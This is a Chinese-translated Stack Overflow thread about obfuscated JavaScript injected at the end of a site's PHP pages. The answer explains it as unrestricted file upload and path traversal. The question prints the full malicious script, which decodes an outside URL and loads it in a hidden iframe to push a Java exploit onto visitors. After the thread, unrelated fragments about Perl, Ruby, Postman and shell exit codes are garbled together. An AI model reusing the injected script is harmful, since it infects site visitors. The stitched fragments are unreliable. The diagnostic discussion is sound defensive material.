问题:
在我的网站空间中,有一些 PHP 文件都以此结尾:
<?php include 'footer.php'; ?>
在这一行之前,文件中还有 HTML 代码。
当然,浏览器中的输出以此结尾:
</body>
</html>
但是昨天,最后突然出现了一些恶意代码。我的 index.php 的输出是:
</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>
我在我的网站空间(通过 FTP 下载)上打开文件,我看到有人将这段代码直接放入文件中!
这怎么会发生?
我能想到的唯一方法:
症状:
用户报告在 Firefox 中弹出一个蓝色面板。它要求他们安装一个插件。现在他们中的一些人的 PC 上有 Exploit.Java.CVE-2010-0886.a。
这是由于恶意代码吗?代码到底做了什么?
你能帮帮我吗?
请帮帮我,我真的很绝望。
也许还有一个问题,如果你知道我是怎么得到它的:我怎样才能防止将来发生这样的事情?
编辑#1:
我在我的网站空间的根目录中找到了一个名为“x76x09.php”的文件。它的文件大小为 44.281 字节。我已经下载并尝试打开它。但是我的杀毒软件说这是木马(Trojan.Script.224490)。我认为该文件已被执行并将恶意代码添加到每个目录中的“index.php”。这有帮助吗?木马怎么会来到我的空间?这是众所周知的病毒吗?
编辑#2:
我的托管人说他现在可以确定该文件不是通过 FTP 上传的。所以感染不是通过 FTP 发生的。根据我的托管商的说法,它一定是不安全的脚本。
编辑#3:
根据 PHPSecInfo 的安全漏洞:
编辑#4:
我已经分析了在我的网络服务器上执行的文件。 Here's the results .
所以这个病毒似乎被称为:
它们中的一些是否会导致我的网站空间上的恶意文件添加了恶意代码?
最佳答案
我不认为问题是您使用的是共享主机,因为我发现了其他六个( degmsb 、 Benvolio 、 joomla01 、 DJ-Alien 、 valerione1979 和 Kars ) 其网站添加了相同的脚本。此外,您的任何文件是否可以被其他人写入是值得怀疑的,因为通过 FTP 上传的文件受文件创建模式位掩码的约束。
我最好的猜测是有人正在使用已知漏洞或针对常见弱点的漏洞来破解网站,并且此人正在使用 Google hacking 识别可能的目标。 . degmsb 的 Wordpress 网站和 Benvolio 的 Burning Board Lite 网站很可能是通过已知的漏洞利用(可能是已知的这些软件基础插件的漏洞利用,例如 TinyMCE)破解的,而您的网站,因为您自己编写的,可能是通过针对一个常见网站的漏洞利用破解的弱点。
鉴于您允许文件上传(您的一个 PHP 脚本接受并保存用户上传的文件),我会考虑 CWE-434: Unrestricted Upload of File with Dangerous Type . CWE-434 漏洞的工作原理如下:假设您允许用户上传头像图像或图片。将上传图像发布到的脚本可能会使用用户提供的相同文件名将文件保存到 /images。现在假设有人上传了 x76x09.gif.php(或 x76x09.gif.asp、x76x09.gif.php4 等)。您的脚本将尽职尽责地将此上传保存到 /images/x76x09.gif.php 并且黑客需要做的就是让服务器运行此脚本是浏览到 /images/x76x09.gif .php。即使文件名为 x76x09.php.gif,某些 Web 服务器也会执行该文件。
另一种可能是PHP接收到的上传的文件名,$_FILES['upload']['name'],也就是filename中的值发送的 Content-Disposition header 构造为类似 ..\modules\x.gif 的内容。如果您的脚本将新上传的文件保存到 str_replace('\\', '/', '/images/' .basename($_FILES['upload']['name'])) ,或非 Windows 主机上的 /images/../modules/x.gif ( http://codepad.org/t83dYZwa ),并且用户可以通过某种方式使您的 PHP 脚本之一 include 或 require modules 目录中的任何脚本(比如 index.php?module=x.gif&action=blah),那么破解者就可以执行任意 PHP。
编辑:它looks like x76x09.php 是某种不受限制的目录浏览器和文件 uploader 。如果用户设法将其上传到您的服务器,那么他们基本上可以做任何您使用 FTP 访问可以做的事情。 删除它。
EDIT2:查找 this PHP source 的副本(gzuncompress(base64_decode("HJ3H...geFb//eeff/79z/8A")); 部分)。 将它从您的所有 PHP 脚本中删除。
EDIT3: 谷歌搜索 PHP 脚本的部分内容,我发现了几个逐字列出该来源的网页,所有这些网页都与各自网站的文件上传功能有关。因此,您网站的黑客很可能使用了 CWE-434 漏洞。
关于PHP 脚本 : malicious JavaScript code at the end,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/3121367/
我正在寻找执行以下操作的正确语法(在Perl、Shell或Ruby中):#variabletoaccessthedatalinesappendedasafileEND_OF_SCRIPT_MARKERrawdatastartshereanditcontinues. 最佳答案 Perl用__DATA__做这个:#!/usr/bin/perlusestrict;usewarnings;while(){print;}__DATA__Texttoprintgoeshere 关于ruby-如何将脚
我有一个在Linux服务器上运行的ruby脚本。它不使用rails或任何东西。它基本上是一个命令行ruby脚本,可以像这样传递参数:./ruby_script.rbarg1arg2如何将参数抽象到配置文件(例如yaml文件或其他文件)中?您能否举例说明如何做到这一点?提前谢谢你。 最佳答案 首先,您可以运行一个写入YAML配置文件的独立脚本:require"yaml"File.write("path_to_yaml_file",[arg1,arg2].to_yaml)然后,在您的应用中阅读它:require"yaml"arg
//1.验证返回状态码是否是200pm.test("Statuscodeis200",function(){pm.response.to.have.status(200);});//2.验证返回body内是否含有某个值pm.test("Bodymatchesstring",function(){pm.expect(pm.response.text()).to.include("string_you_want_to_search");});//3.验证某个返回值是否是100pm.test("Yourtestname",function(){varjsonData=pm.response.json
有没有一种简单的方法可以判断ruby脚本是否已经在运行,然后适本地处理它?例如:我有一个名为really_long_script.rb的脚本。我让它每5分钟运行一次。当它运行时,我想看看之前运行的是否还在运行,然后停止第二个脚本的执行。有什么想法吗? 最佳答案 ps是一种非常糟糕的方法,并且可能会出现竞争条件。传统的Unix/Linux方法是将PID写入文件(通常在/var/run中)并在启动时检查该文件是否存在。例如pid文件位于/var/run/myscript.pid然后你会在运行程序之前检查它是否存在。有一些技巧可以避免
我正在开发一个Ruby脚本,需要在没有Ruby解释器的情况下部署到系统上。它将需要在使用ELF格式的FreeBSD系统上运行。我知道有一个ruby2exe项目可以编译在Windows上运行的ruby脚本,但是在其他操作系统上这样做容易吗?甚至可能吗? 最佳答案 您是否检查过Rubinius或JRuby是否允许您预编译您的代码? 关于ruby-ruby脚本可以预编译成二进制文件吗?,我们在StackOverflow上找到一个类似的问题: https://
我目前可以将stdout重定向到ruby/rails中的字符串变量,只需在bash中运行命令并将结果设置为我的字符串变量,如下所示。val=%x[#{cmd}]其中cmd是表示bash命令的字符串。但是,这仅捕获stdout,因为我想捕获stderr并将其设置为ruby中的字符串——有什么想法吗? 最佳答案 简单地重定向它:val=%x[#{cmd}2>&1]如果您只想从stderr捕获输出,请在将其复制到fd2后关闭stdout的文件描述符。val=%x[#{cmd}2>&1>/dev/null]
我们如何从ruby脚本返回值?#!/usr/bin/envrubya="test"a我们如何在Ubuntu终端或java或c中访问'a'的值? 最佳答案 在ruby/python脚本中打印你的变量,然后可以通过示例从shell脚本中读取它:#!/bin/bashruby_var=$(rubymyrubyscript.rb)python_var=$(pythonmypythonscript.py)echo"$ruby_var"echo"$python_var"注意你的ruby/python脚本只打印这个变量(有更多复杂的方
我在跑Fastlane(适用于iOS的持续构建工具)以执行用于解密文件的自定义shell脚本。这是命令。sh"./decrypt.shENV['ENCRYPTION_P12']"我想不出将环境变量传递给该脚本的方法。显然,如果我将密码硬编码到脚本中,它就可以正常工作。sh"./decrypt.shmypwd"有什么建议吗? 最佳答案 从直接Shell中扩展假设这里的sh是一个faSTLane命令,它以给定的参数作为脚本文本调用shell命令:#asafastlanedirectivesh'./decrypt.sh"$ENCRYPTI
我希望这些值匹配。当shell脚本由于某些错误条件而退出时(因此返回非零值),它们不匹配。壳$?返回1,ruby$?返回256。>>%x[lskkr]ls:kkr:Nosuchfileordirectory=>"">>puts$?256=>nil>>exitHadoop:~Madcap$lskkrls:kkr:NosuchfileordirectoryHadoop:~Madcap$echo$?1 最佳答案 在Ruby中$?是一个Process::Status实例。打印$?等同于调用$?.to_s,这等同于$?.to_i.to_s(来
我有一个Ruby文件,我将它作为rubyfile.rb"parameters"运行。我更喜欢将它作为regtask参数运行,而不必每次都包含ruby和文件名。我希望它与ls处于同一级别。我将如何做到这一点? 最佳答案 编辑你的文件,确保这是第一行,这样你的系统就知道如何执行你的文件:#!/usr/bin/envruby接下来,更改文件的权限以使其可执行:chmoda+xfile.rb最后,重命名并将其移动到将要执行的位置,而无需编写其完整路径:mkdir-p~/binmvfile.rb~/bin/regtask(如果~/bin存在,